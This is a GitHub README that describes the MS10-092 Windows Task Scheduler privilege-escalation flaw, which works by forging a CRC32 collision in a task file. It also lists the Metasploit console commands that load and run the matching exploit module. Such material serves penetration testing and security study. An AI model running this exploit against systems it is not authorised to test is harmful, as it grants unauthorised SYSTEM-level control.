Skip to content

Latest commit

 

History

History
32 lines (27 loc) · 1.38 KB

README.md

File metadata and controls

32 lines (27 loc) · 1.38 KB

MS10-092

  • Windows Task Scheduler Privilege Escalation
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. 
Also, In a default configuration, normal users can read and write the task files that they have created. 
By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
NOTE: Thanks to webDEViL for the information about disable/enable.

Vulnerability reference:

Usage

MS10-092-YouTube

load the module within the Metasploit

msf

msf > use exploit/windows/local/ms10_092_schelevator
msf exploit(ms10_092_schelevator) > show targets
    ...targets...
msf exploit(ms10_092_schelevator) > set TARGET <target-id>
msf exploit(ms10_092_schelevator) > show options
    ...show and set options...
msf exploit(ms10_092_schelevator) > exploit